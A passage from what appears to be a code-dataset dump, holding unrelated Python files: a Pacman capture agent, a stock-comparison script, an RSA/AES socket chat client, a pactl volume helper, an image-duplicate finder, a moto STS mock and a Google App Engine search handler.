MAPPING_DJAMA_DETAIL_WILD_TO_NOMENCLATURE_FILE_CSV)\n print(skipped)\n\n djama_remain_nomenclatured = djama_remains_df.join(remains_to_nomen_dataset.set_index('article'),\n on='article', how='inner')\n\n wild_remains_dataset = pd.read_excel(wildberries_stocks_xlsx, skiprows=1)\n stock_compare_df = pd.merge(djama_remain_nomenclatured, wild_remains_dataset,\n how='outer', left_on=['nomenclature'],\n right_on=['Артикул поставщика']\n )\n res = pd.DataFrame(data=stock_compare_df, columns=['article', 'nomenclature', 'count',\n 'Артикул поставщика',\n 'Подольск', 'Новосибирск', 'Хабаровск', 'Краснодар',\n 'Екатеринбург', 'Санкт-Петербург'])\n res['sum_all'] = res.fillna(0)['Подольск'] + res.fillna(0)['Новосибирск'] \\\n + res.fillna(0)['Хабаровск'] + res.fillna(0)['Краснодар'] + \\\n res.fillna(0)['Екатеринбург'] + res.fillna(0)['Санкт-Петербург']\n\n res = res[(res['count'].isnull()) | (res['count'] > 0)]\n\n res = res.rename(columns={\"count\": \"Остаток у Джамы\", \"article\": \"Артикул Джамы\", \"sum_all\": \"Остаток на складах\"})\n res = res[['Артикул Джамы', 'Остаток у Джамы', 'nomenclature', 'Артикул поставщика',\n 'Остаток на складах',\n 'Подольск', 'Новосибирск', 'Хабаровск',\n 'Краснодар', 'Екатеринбург', 'Санкт-Петербург']]\n\n write_data_to_csv(res, output_csv)\n\n\ncompare_stocks('/home/stani/Загрузки/остатки Байрамали (31).xls',\n '/home/stani/Загрузки/ExportToEXCELOPENXML - 2020-06-29T104240.625.xlsx',\n 'out.csv')\n","sub_path":"ru/textilstock/assortment/stocks/compare_stocks.py","file_name":"compare_stocks.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"330008245","text":"# myTeam.py\n# ---------\n# Licensing 
Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\"\"\"\nThis submission is by Joshua Yurtsever and Luke Dzwonczyk. We use minimax and features\nsuch as the number of pelets, dead ends, number of power pelets, and the distance\nfrom ghosts for our AI to make decisions.\n\"\"\"\nimport random\nimport sys\nimport time\nfrom util import manhattanDistance\n\nfrom captureAgents import CaptureAgent\n\n\n#################\n# Team creation #\n#################\n\ndef createTeam(firstIndex, secondIndex, isRed,\n first = 'DefenseAgent', second = 'OffenseAgent'):\n \"\"\"\n This function should return a list of two agents that will form the\n team, initialized using firstIndex and secondIndex as their agent\n index numbers. isRed is True if the red team is being created, and\n will be False if the blue team is being created.\n\n As a potentially helpful development aid, this function can take\n additional string-valued keyword arguments (\"first\" and \"second\" are\n such arguments in the case of this function), which will come from\n the --redOpts and --blueOpts command-line arguments to capture.py.\n For the nightly contest, however, your team will be created without\n any extra arguments, so you should make sure that the default\n behavior is what you want for the nightly contest.\n \"\"\"\n\n # The following line is an example only; feel free to change it.\n return [eval(first)(firstIndex), eval(second)(secondIndex)]\n\n##########\n# Agents #\n##########\n\nclass DefenseAgent(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n def __init__(self, index, timeForComputing = .1):\n CaptureAgent.__init__(self, index, timeForComputing)\n self.steps = 0\n self.defense = True\n self.begintime = time.time()\n\n def evaluationFunction(self, gameState):\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n\n closestFoodDist = min(map(lambda x: self.getMazeDistance(x, myPos), self.getFood(gameState).asList()))\n if myState.isPacman:\n return -5\n if invaders:\n invaderDist = min([self.getMazeDistance(myPos, e.getPosition()) for e in invaders if e.getPosition() != None])\n if invaderDist == 0:\n return 10\n else:\n enemyScore = -invaderDist\n else:\n enemyScore = 20 - closestFoodDist\n return foodCount(self.getFoodYouAreDefending(gameState)) + enemyScore + self.getScore(gameState)\n\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, 
p2)\n\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n\n '''\n Your initialization code goes here, if you need any.\n '''\n\n\n def chooseAction(self, gameState):\n \"\"\"\n Picks among actions randomly.\n \"\"\"\n actions = gameState.getLegalActions(self.index)\n self.begintime = time.time()\n '''\n Defense Agent focuses on eating enemy pacman in its zone as long\n as it is not scared.\n '''\n depth = 2\n defense = [self.index]\n agentInds = defense + [i for i in self.getOpponents(gameState) if gameState.getAgentState(i).isPacman and\n gameState.getAgentState(i).getPosition() != None]\n numAgents = len(agentInds)\n def calcWithPrune(gameState, depth, k, alpha, beta):\n if depth == 0 or (time.time() - self.begintime > self.timeForComputing and k == 0):\n actions = gameState.getLegalActions(self.index)\n return self.evaluationFunction(gameState), random.choice(actions)\n acts = gameState.getLegalActions(agentInds[k])\n nextk = (k + 1) % numAgents\n bestAction = None\n if not nextk:\n depth -= 1\n if k >= len(defense): #minimizer\n v = sys.maxint\n for act in acts:\n next = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if next < v:\n v = next\n bestAction = act\n if v < alpha:\n return v, act\n beta = min(beta, v)\n else: #maximizer\n v = -sys.maxint\n for act in acts:\n child = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if child > v:\n v = child\n bestAction = act\n if v > beta:\n return v, act\n alpha = max(alpha, v)\n return v, bestAction\n\n return calcWithPrune(gameState, depth, 0, -sys.maxint, sys.maxint)[1]\n\n\n\n\n\nclass OffenseAgent(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n def __init__(self, index, timeForComputing = .1):\n CaptureAgent.__init__(self, index, timeForComputing)\n self.steps = 0\n self.defense = False\n self.base = None\n self.begintime = time.time()\n\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, p2)\n\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. 
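`calcWithPrune` above is depth-limited minimax with alpha-beta cutoffs over the live agents. The same pruning logic on a toy game tree, self-contained and detached from the capture framework (leaves are static scores, internal nodes are lists, and the root maximizes):

```python
import math

def alphabeta(node, maximizing, alpha=-math.inf, beta=math.inf):
    if isinstance(node, int):          # leaf: static evaluation
        return node
    if maximizing:
        v = -math.inf
        for child in node:
            v = max(v, alphabeta(child, False, alpha, beta))
            if v > beta:               # beta cutoff, as in calcWithPrune
                return v
            alpha = max(alpha, v)
        return v
    v = math.inf
    for child in node:
        v = min(v, alphabeta(child, True, alpha, beta))
        if v < alpha:                  # alpha cutoff
            return v
        beta = min(beta, v)
    return v

tree = [[3, 5], [2, 9], [0, 7]]
assert alphabeta(tree, True) == 3      # the 9 and 7 leaves are pruned
```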
If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n '''\n Your initialization code goes here, if you need any.\n '''\n self.base = gameState.getAgentPosition(self.index)\n self.calibrate = 0\n self.followedCount = 0\n\n def chooseAction(self, gameState):\n \"\"\"\n Finds the best action using minimax\n \"\"\"\n self.begintime = time.time()\n if self.followed(gameState):\n self.followedCount += 1\n else:\n self.followedCount = 0\n if gameState.getAgentState(self.index).numCarrying - self.calibrate >= 5 or self.followedCount > 3:\n if not gameState.getAgentState(self.index).isPacman:\n self.calibrate = gameState.getAgentState(self.index).numCarrying\n actions = gameState.getLegalActions(self.index)\n result = None\n best = -sys.maxint\n for act in actions:\n if act == 'Stop':\n continue\n if self.backeval(gameState.generateSuccessor(self.index, act)) > best:\n result = act\n best = self.backeval(gameState.generateSuccessor(self.index, act))\n return result\n\n depth = 2\n agentInds = [self.index] + [i for i in self.getOpponents(gameState) if not gameState.getAgentState(i).isPacman and\n gameState.getAgentState(i).getPosition() != None]\n numAgents = len(agentInds)\n def calcWithPrune(gameState, depth, k, alpha, beta):\n if depth == 0 or (time.time() - self.begintime > self.timeForComputing and k == 0):\n actions = gameState.getLegalActions(self.index)\n return self.evaluationFunction(gameState), random.choice(actions)\n acts = gameState.getLegalActions(agentInds[k])\n nextk = (k + 1) % numAgents\n bestAction = None\n if not nextk:\n depth -= 1\n if k != 0: #minimizer\n v = sys.maxint\n for act in acts:\n next = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if next < v:\n v = next\n bestAction = act\n if v < alpha:\n return v, act\n beta = min(beta, v)\n else: #maximizer\n v = -sys.maxint\n for act in acts:\n if act == 'Stop':\n continue\n child = calcWithPrune(gameState.generateSuccessor(agentInds[k], act),\n depth, nextk, alpha, beta)[0]\n if child > v:\n v = child\n bestAction = act\n if v > beta:\n return v, act\n alpha = max(alpha, v)\n return v, bestAction\n\n return calcWithPrune(gameState, depth, 0, -sys.maxint, sys.maxint)[1]\n def followed(self, gameState):\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n ghosts = [a for a in enemies if not a.isPacman and a.getPosition() != None]\n newScaredTimes = [g.scaredTimer for g in ghosts]\n newGhostPositions = [g.getPosition() for g in ghosts]\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n if ghosts:\n closestGhost = newGhostPositions[0]\n for ghostPos in newGhostPositions:\n if self.getMazeDistance(ghostPos, myPos) < self.getMazeDistance(closestGhost, myPos):\n closestGhost = ghostPos\n return self.getMazeDistance(closestGhost, myPos) < 2\n return False\n\n def backeval(self, gameState):\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n ghosts = [a for a in enemies if not a.isPacman and a.getPosition() != None]\n newScaredTimes = [g.scaredTimer for g in ghosts]\n newGhostPositions = [g.getPosition() for g in ghosts]\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n lenCaps = len(self.getCapsules(gameState))\n if ghosts:\n backDist = self.getMazeDistance(myPos, 
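`followed` and `backeval` above both locate the nearest ghost with an explicit scan-and-compare loop. `min` with a key function expresses the same search in one line; `distance` below is a hypothetical stand-in for `self.getMazeDistance`:

```python
def closest(my_pos, ghost_positions, distance):
    # equivalent to the scan loops above: smallest distance wins
    return min(ghost_positions, key=lambda g: distance(g, my_pos))

manhattan = lambda a, b: abs(a[0] - b[0]) + abs(a[1] - b[1])
assert closest((0, 0), [(5, 5), (1, 2), (3, 0)], manhattan) == (1, 2)
```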
self.base)\n closestGhost = newGhostPositions[0] # tuple\n for ghostPos in newGhostPositions:\n if self.getMazeDistance(ghostPos, myPos) < self.getMazeDistance(closestGhost, myPos):\n closestGhost = ghostPos\n if self.getMazeDistance(closestGhost, myPos) == 0:\n return -100000000\n if newScaredTimes[newGhostPositions.index(closestGhost)] < 6:\n ghostWeight = .2\n ghostScore = self.getMazeDistance(closestGhost, myPos)\n return ghostWeight * ghostScore / (backDist + 1) - 2*backDist - 100*lenCaps\n return self.evaluationFunction(gameState)\n def evaluationFunction(self, gameState):\n myState = gameState.getAgentState(self.index)\n myPos = myState.getPosition()\n myFood = self.getFood(gameState)\n if not myState.isPacman:\n pac = -5\n else:\n pac = 0\n enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]\n ghosts = [a for a in enemies if not a.isPacman and a.getPosition() != None]\n GhostStates = ghosts\n newScaredTimes = [ghostState.scaredTimer for ghostState in GhostStates]\n\n closestFoodDist = min(map(lambda x: self.getMazeDistance(x, myPos), myFood.asList()))\n newGhostPositions = [g.getPosition() for g in ghosts]\n\n closeFoodScore = 1 / float(closestFoodDist) if not myFood[int(myPos[0])][int(myPos[1])] else 20\n lenCaps = len(self.getCapsules(gameState))\n\n if self.getCapsules(gameState):\n closestCapDist = min(map(lambda x: self.getMazeDistance(x, myPos), self.getCapsules(gameState)))\n capScore = 1/float(closestCapDist)\n else:\n closestCapDist = 0\n capScore = 0\n if GhostStates:\n closestGhost = newGhostPositions[0] # tuple\n for ghostPos in newGhostPositions:\n if self.getMazeDistance(ghostPos, myPos) < self.getMazeDistance(closestGhost, myPos):\n closestGhost = ghostPos\n if self.getMazeDistance(closestGhost, myPos) == 0:\n return -100000000\n if self.getMazeDistance(closestGhost, myPos) < 3 and deadEnd(gameState, myPos):\n return -1000\n if newScaredTimes[newGhostPositions.index(closestGhost)] == 0:\n ghostWeight = .2\n if self.followed(gameState):\n ghostWeight = .7\n ghostScore = self.getMazeDistance(closestGhost, myPos)\n return self.getScore(gameState) + ghostWeight * ghostScore / (\n closestFoodDist + 1) - foodCount(self.getFood(gameState)) + 3*closeFoodScore + pac - 100*lenCaps\n return closeFoodScore - 5*foodCount(myFood)\n\ndef deadEnd(gameState, myPos):\n combinations = [[(myPos[0], myPos[1] + 1), (myPos[0] + 1, myPos[1]), (myPos[0], myPos[1] - 1)],\n [(myPos[0], myPos[1] + 1), (myPos[0] - 1, myPos[1]), (myPos[0], myPos[1] - 1)],\n [(myPos[0] - 1, myPos[1]), (myPos[0], myPos[1] + 1), (myPos[0], myPos[1] - 1)],\n [(myPos[0] + 1, myPos[1]), (myPos[0], myPos[1] + 1), (myPos[0], myPos[1] - 1)],\n [(myPos[0], myPos[1] - 1), (myPos[0], myPos[1] + 1), (myPos[0] + 1, myPos[1])]]\n for comb in combinations:\n surr = True\n for pos in comb:\n surr = surr and gameState.hasWall(int(pos[0]), int(pos[1]))\n if surr:\n return True\n return False\n\ndef foodCount(foodGrid):\n res = 0\n for bool in foodGrid.asList():\n if bool:\n res += 1\n return res","sub_path":"raw_submissions/myTeam - Joshua Yurtsever.py","file_name":"myTeam - Joshua Yurtsever.py","file_ext":"py","file_size_in_byte":14822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"132746064","text":"import os\nfrom PIL import Image as PIL_I\n\n\n##I was thinking something like Screen.tile.batch.new(self. 
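`foodCount` at the bottom of the agent file iterates `foodGrid.asList()` and counts truthy entries. Assuming the Berkeley Pacman `Grid` API, `asList()` already returns only the coordinates of the `True` cells, so the count reduces to a length:

```python
def food_count(food_grid):
    # asList() yields (x, y) tuples for True cells, all of which are truthy
    return len(food_grid.asList())

class FakeGrid:                        # tiny stand-in for the real Grid
    def asList(self):
        return [(1, 1), (2, 3)]

assert food_count(FakeGrid()) == 2
```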
parameters..)\n##where there are classes inside classes.\n\nclass Palette(object):\n\n #palbase is the contant grey scale only used for setting palmask on init\n __palbase = [0x000000, 0x0f0f0f, 0x1f1f1f, 0x2f2f2f, 0x3f3f3f, 0x4f4f4f, 0x5f5f5f, 0x6f6f6f,\n 0x7f7f7f, 0x8f8f8f, 0x9f9f9f, 0xafafaf, 0xbfbfbf, 0xcfcfcf, 0xdfdfdf, 0xefefef]\n\n def __init__(self, bytes: int) -> None:\n if bytes != 1 and bytes != 2 and bytes != 3 and bytes != 4:\n raise ValueError(\"Error: class palette, bytes must be either 1, 2, 3, or 4\")\n else:\n\n #palmask is the grey scale refrence palette for the image\n self.__palmask = []\n #palette the colors to replace in image\n self.__palette = []\n #bytes the palette byte length\n self.__bytes = bytes\n #color the current color to append to palmask\n self.__color = self.__palbase[0]\n\n #loop though palbase and set palmask to the correct bytes\n for i in range(len(self.__palbase)):\n if i % (2 ^ self.__bytes) == 0:\n print(i)\n self.__color = self.__palbase[i]\n #self.__palmask.append(self.__color)\n #print(self.__color)\n\n #a test method for debugging won't be in release\n def get_mask(self):\n return self.__palmask\n\n def get_palette_hex(self, c0: int, c1: int, c2: int, c3: int, c4: int, c5: int, c6: int, c7: int):\n pal = []\n my_list = [c0, c1, c2, c3, c4, c5, c6, c7]\n\n for base in my_list:\n mask = 0xff\n\n a = (base >> 16) & mask\n b = (base >> 8) & mask\n c = (base >> 0) & mask\n\n pal.extend((a, b, c))\n\n return pal\n\nclass Tile:\n def __init__(self):\n pass\n\n def get_rect(self, index: int, tile_size: int):\n x1 = int(index % 16) * tile_size\n y1 = int(index / 16) * tile_size\n x2 = int(x1 + tile_size)\n y2 = int(y1 + tile_size)\n rect = (x1, y1, x2, y2)\n return rect\n\n\n\n\n\n '''\n def new(self):\n img = PIL_I.new(\"P\", (128, 128))\n img = img.convert(\"P\", palette=PIL_I.ADAPTIVE, colors=16)\n bank = []\n\n for i in range(128):\n Tile.get_rect(i, 8)\n tile = img.crop(rect)\n bank.insert(0, tile)\n return bank\n\n def load(self, fp: str):\n img = PIL_I.open(fp)\n img = img.convert(\"P\", palette=PIL_I.ADAPTIVE, colors=16)\n bank = []\n\n for i in range(128):\n x1 = int(i % 16) * 8\n y1 = int(i / 16) * 8\n x2 = int(x1 + 8)\n y2 = int(y1 + 8)\n rect = (x1, y1, x2, y2)\n tile = img.crop(rect)\n bank.insert(0, tile)\n bank[i].show()\n return bank\n\n def save(self, fp: str, bank: list):\n img = PIL_I.new(\"P\", (256, 256))\n img = img.convert(\"P\", palette=PIL_I.ADAPTIVE, colors=16)\n bank = bank\n\n for i in range(128):\n x1 = int(i % 16) * 8\n y1 = int(i / 16) * 8\n x2 = int(x1 + 8)\n y2 = int(y1 + 8)\n rect = (x1,y1,x2,y2)\n img.paste(bank[i], rect)\n\n img.convert(\"RGBA\", colors=256)\n return img'''\n\n\n\n\n\n\n\n","sub_path":"Scripts/Classes/Screen.py","file_name":"Screen.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"176323045","text":"##\n## Imprima la suma de la columna 2 por cada letra \n## de la columna 4, ordnados alfabeticamente.\n##\n## a,114\n## b,40\n## c,91\n## d,65\n## e,79\n## f,110\n## g,35\n##\n\n# Carga de base de datos y ajuste de formato \n\ndatos=open('data.csv','r').readlines()\ndatos1 = [z.replace('\\n','') for z in datos]\ndatos2 = [z.replace(',',';') for z in datos1]\ndatos3 = [z.replace('\\t',',') for z in datos2]\ndatos4 = [z.split(',') for z in datos3]\n\n# Creamos listas vacias para almacenar llaves y claves\n\nllave = []\nclaves = []\n\n# Agregamos datos a las listas vacias\n\nfor fila in datos4: \n llave += 
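In `Palette.__init__` above, the mask loop tests `i % (2 ^ self.__bytes) == 0`. In Python `^` is bitwise XOR, not exponentiation, so with `bytes == 2` the divisor is `2 ^ 2 == 0` and the modulo raises `ZeroDivisionError`; `2 ** bytes` (or `1 << bytes`) looks like the intent:

```python
for b in (1, 2, 3, 4):
    print(b, 2 ^ b, 2 ** b)   # XOR gives 3, 0, 1, 6; the power gives 2, 4, 8, 16
    assert 2 ** b == 1 << b   # two equivalent spellings of a power of two
```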
[(int(fila[1]), valor) for valor in fila[3].split(';')]\n claves += [valor for valor in fila[3].split(';')]\n\n# Creamos lista con valores unicos\n\nvalores_unicos = set(claves)\nvalores_unicos = list(valores_unicos)\nvalores_unicos.sort()\n\n# Imprimimos en formato necesario\n\nfor valor in valores_unicos:\n x=0\n for i,j in llave:\n if valor == j:\n x += i\n print (\"{},{}\".format(valor,x))","sub_path":"q12.py","file_name":"q12.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"561451766","text":"from __future__ import unicode_literals\nfrom base64 import b64decode\nimport datetime\nimport xmltodict\nfrom moto.core import BaseBackend, BaseModel\nfrom moto.core.utils import iso_8601_datetime_with_milliseconds\nfrom moto.core import ACCOUNT_ID\nfrom moto.sts.utils import (\n random_access_key_id,\n random_secret_access_key,\n random_session_token,\n random_assumed_role_id,\n)\n\n\nclass Token(BaseModel):\n def __init__(self, duration, name=None, policy=None):\n now = datetime.datetime.utcnow()\n self.expiration = now + datetime.timedelta(seconds=duration)\n self.name = name\n self.policy = None\n\n @property\n def expiration_ISO8601(self):\n return iso_8601_datetime_with_milliseconds(self.expiration)\n\n\nclass AssumedRole(BaseModel):\n def __init__(self, role_session_name, role_arn, policy, duration, external_id):\n self.session_name = role_session_name\n self.role_arn = role_arn\n self.policy = policy\n now = datetime.datetime.utcnow()\n self.expiration = now + datetime.timedelta(seconds=duration)\n self.external_id = external_id\n self.access_key_id = \"ASIA\" + random_access_key_id()\n self.secret_access_key = random_secret_access_key()\n self.session_token = random_session_token()\n self.assumed_role_id = \"AROA\" + random_assumed_role_id()\n\n @property\n def expiration_ISO8601(self):\n return iso_8601_datetime_with_milliseconds(self.expiration)\n\n @property\n def user_id(self):\n return self.assumed_role_id + \":\" + self.session_name\n\n @property\n def arn(self):\n return \"arn:aws:sts::{account_id}:assumed-role/{role_name}/{session_name}\".format(\n account_id=ACCOUNT_ID,\n role_name=self.role_arn.split(\"/\")[-1],\n session_name=self.session_name,\n )\n\n\nclass SESSBackend(BaseBackend):\n def __init__(self):\n self.assumed_roles = []\n\n def get_session_token(self, duration):\n token = Token(duration=duration)\n return token\n\n def get_federation_token(self, name, duration, policy):\n token = Token(duration=duration, name=name, policy=policy)\n return token\n\n def assume_role(self, **kwargs):\n role = AssumedRole(**kwargs)\n self.assumed_roles.append(role)\n return role\n\n def describe_workspaces(self, **kwargs):\n import json\n fp = open('fixtures/data_mock.json', 'r')\n data = json.load(fp)\n if kwargs:\n raise(\"no don't do that no arguments for now\")\n return data\n\nsess_backend = SESSBackend()\n","sub_path":"moto/session_workspaces/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"42643401","text":"import socket\nimport rsa\nimport pickle\nimport hashlib\nfrom myaes import MYAES\nfrom errorclass import AuthenticationError\n\n\nclass Client:\n\n def __init__(self):\n # 产生非对称密钥\n self.asyKey = rsa.newkeys(2048)\n # 公钥和私钥\n self.publicKey = self.asyKey[0]\n self.privateKey = self.asyKey[1]\n\n\n def link_server(self, addr=('localhost', 
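`describe_workspaces` in the moto-style backend above guards with `raise("no don't do that no arguments for now")`. Raising a plain string fails with `TypeError: exceptions must derive from BaseException`, so the guard itself would crash; raising a real exception class preserves the intent:

```python
def describe_workspaces(**kwargs):
    if kwargs:
        raise ValueError("no arguments supported for now")
    return {"Workspaces": []}

try:
    describe_workspaces(limit=1)
except ValueError as err:
    print("rejected:", err)
```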
8080)):\n # 创建socket通信对象\n # 默认使用AF_INET协议族,即ipv4地址和端口号的组合以及tcp协议\n clientSocket = socket.socket()\n # 默认连接服务器地址为本机ip和8080端口\n clientSocket.connect(addr)\n\n # 向服务器传递公钥,和该公钥字符串化后的sha256值\n print(\"-----正在向服务器传送公钥\")\n sendKey = pickle.dumps(self.publicKey)\n sendKeySha256 = hashlib.sha256(sendKey).hexdigest()\n clientSocket.send(pickle.dumps((sendKey, sendKeySha256)))\n\n # 接受服务器传递的密钥并进行解密\n symKey, symKeySha256 = pickle.loads(clientSocket.recv(1024))\n if hashlib.sha256(symKey).hexdigest() != symKeySha256:\n raise AuthenticationError(\"-----密钥被篡改!\")\n else:\n symKey1 = pickle.loads(rsa.decrypt(symKey, self.privateKey))\n print(\"-----密钥交换完成\")\n\n\n\n # 初始化加密对象\n aes = MYAES()\n while True:\n sendData = input(\"输入你要发送的消息:\")\n if(sendData == 'quit'):\n clientSocket.close()\n break\n en_sendData = aes.myaes_encrypt(sendData, symKey1)\n clientSocket.send(bytes(en_sendData))\n print(\"-----消息发送成功,等待回应...\")\n\n en_recvData = clientSocket.recv(1024)\n plaintext = aes.myaes_decrypt(en_recvData, symKey1)\n print('接收到服务器传来的消息:' + plaintext)\n\n\n\n\n","sub_path":"clientclass.py","file_name":"clientclass.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"62889397","text":"\"\"\"A small library for interacting with the pactl command line tool.\n\nThis library allows for a few simple interactions with linux pulseaudio, like\nviewing active sinks (sound outputs, usually loosely correlating with speakers)\nand their relative volumes, and setting volume absolutely or relatively.\n\nMost functions take a sink argument which defaults to retrieving and using\nthe first 'RUNNING' sink found. This uses a full subprocess, so users doing\nrepeated calls are recommended to get a sink object (eg. through active_sink())\nand pass that to successive calls.\n\nThe pactl tool will need to be installed for this library to work. It is commonly\ninstalled by default when PulseAudio is installed, and on many major distros.\n\"\"\"\n\nimport re\nimport subprocess\n\n\nLIST_PATTERNS = {\n 'state': 'State: (\\w+)',\n 'volume': 'Volume: 0: +(\\d+)%',\n 'name': 'Name: (.+)'\n}\n\n\ndef list_sinks():\n \"\"\"Return a list of sink objects; these are dicts of properties.\"\"\"\n output = subprocess.check_output(['pactl', 'list', 'sinks']).decode()\n sinks = []\n\n for line in output.split('\\n'):\n if line.startswith('Sink #'):\n sink = {}\n sinks.append(sink)\n else:\n # While it's close to YAML output, it isn't, and doesn't parse at all :P\n # So some mad hacks here to pull out some basic data\n for prop, pattern in LIST_PATTERNS.items():\n vals = re.findall(pattern, line)\n if vals:\n sink[prop] = vals[0]\n\n return sinks\n\n\ndef active_sink():\n \"\"\"Retrieve the first running PulseAudio sink.\"\"\"\n for sink in list_sinks():\n if sink['state'] == 'RUNNING':\n return sink\n\n\ndef set_volume(value, sink=None):\n \"\"\"Set an absolute volume for a sink (0-100). Default to active sink.\"\"\"\n sink = sink or active_sink()\n return subprocess.check_call(['pactl', 'set-sink-volume', sink['name'],\n '{}%'.format(value)])\n\n\ndef inc_volume(delta=1, sink=None):\n \"\"\"Set a relative volume for a sink (can be negative). 
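The client above performs a hybrid handshake: it ships an RSA public key plus a SHA-256 digest, then receives an RSA-encrypted AES session key and re-checks its digest. A transport-free sketch of the digest check; note that a bare hash only detects accidental corruption, since an attacker who can replace the blob can recompute the digest too (an HMAC or a signature is needed for authenticity):

```python
import hashlib
import pickle

def verify_and_load(blob, digest):
    if hashlib.sha256(blob).hexdigest() != digest:
        raise ValueError("key material does not match its digest")
    return pickle.loads(blob)

key = pickle.dumps(b"0123456789abcdef")
assert verify_and_load(key, hashlib.sha256(key).hexdigest()) == b"0123456789abcdef"
```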
Default to active sink.\"\"\"\n sink = sink or active_sink()\n if sink:\n volume = int(sink['volume'])\n set_volume(max(0, min(100, volume + delta)), sink=sink)\n return sink\n","sub_path":"pactl.py","file_name":"pactl.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"579301962","text":"from PIL import Image\n\nimport os, sys\n\ndirectory = sys.argv[1]\nfilenames = [a for a in os.listdir(directory)]\nprint(len(filenames))\n\n# im = Image.open(\"E:\\\\undemote-arche\\\\wallpaper-cycle-2017-0519\\\\0wS4m - Imgur.jpg\")\n# im = Image.open(\"E:\\\\undemote-arche\\\\wallpaper-cycle-2017-0519\\\\0wS4m - Imgur.jpg\")\n\nindexed = {}\nlengths = []\nfor a in filenames:\n if os.path.isdir(directory+'\\\\'+a):\n continue\n im = Image.open(directory+'\\\\'+a)\n histogram = tuple(im.histogram())\n if histogram not in indexed: indexed[histogram] = []\n indexed[histogram].append(a)\n lengths.append(len(histogram))\nprint(lengths)\nfor a in indexed:\n if len(indexed[a]) > 1:\n print(\"DUPES!\")\n for a in indexed[a]:\n print(\" \"+a)\n# print(len(im.histogram()))","sub_path":"codemuse2018/image-similarity.py","file_name":"image-similarity.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"498574744","text":"from cgi import parse_qs\nfrom datetime import datetime\nimport os\nimport string\nimport urllib\nimport logging\nfrom urlparse import urlparse\n\nimport webapp2\nfrom webapp2_extras import jinja2\n\nfrom google.appengine.api import search\nfrom google.appengine.api import users\n\n_INDEX_NAME = 'greeting'\n\n\n\nclass BaseHandler (webapp2.RequestHandler):\n @webapp2.cached_property\n def jinja2(self):\n return jinja2.get_jinja2(app=self.app)\n\n def render_template(self, filename, template_args):\n self.response.write(self.jinja2.render_template(filename, **template_args))\n\n\n\ndef CreateDocument(author, content):\n \"\"\"Creates a search.Document from content written by the author.\"\"\"\n if author:\n nickname = author.nickname().split('@')[0]\n else:\n nickname = 'anonymous'\n # Let the search service supply the document id.\n return search.Document(\n fields=[search.TextField(name='author', value=nickname),\n search.HtmlField(name='content', value=content),\n search.DateField(name='date', value=datetime.now().date())])\n \n \n \nclass Populate(BaseHandler):\n def get(self):\n template_values = {\n 'url': '/',\n 'url_linktext': 'click here to view search page'\n }\n self.render_template(\"populate.html\", template_values)\n \n def post(self):\n author = None\n if users.get_current_user():\n author = users.get_current_user()\n\n content = self.request.get('content')\n if content:\n search.Index(name=_INDEX_NAME).put(CreateDocument(author, content))\n \n self.redirect('/populate')\n \n \n \nclass Search(BaseHandler):\n def get(self):\n \"\"\"Handles a get request with a query.\"\"\"\n uri = 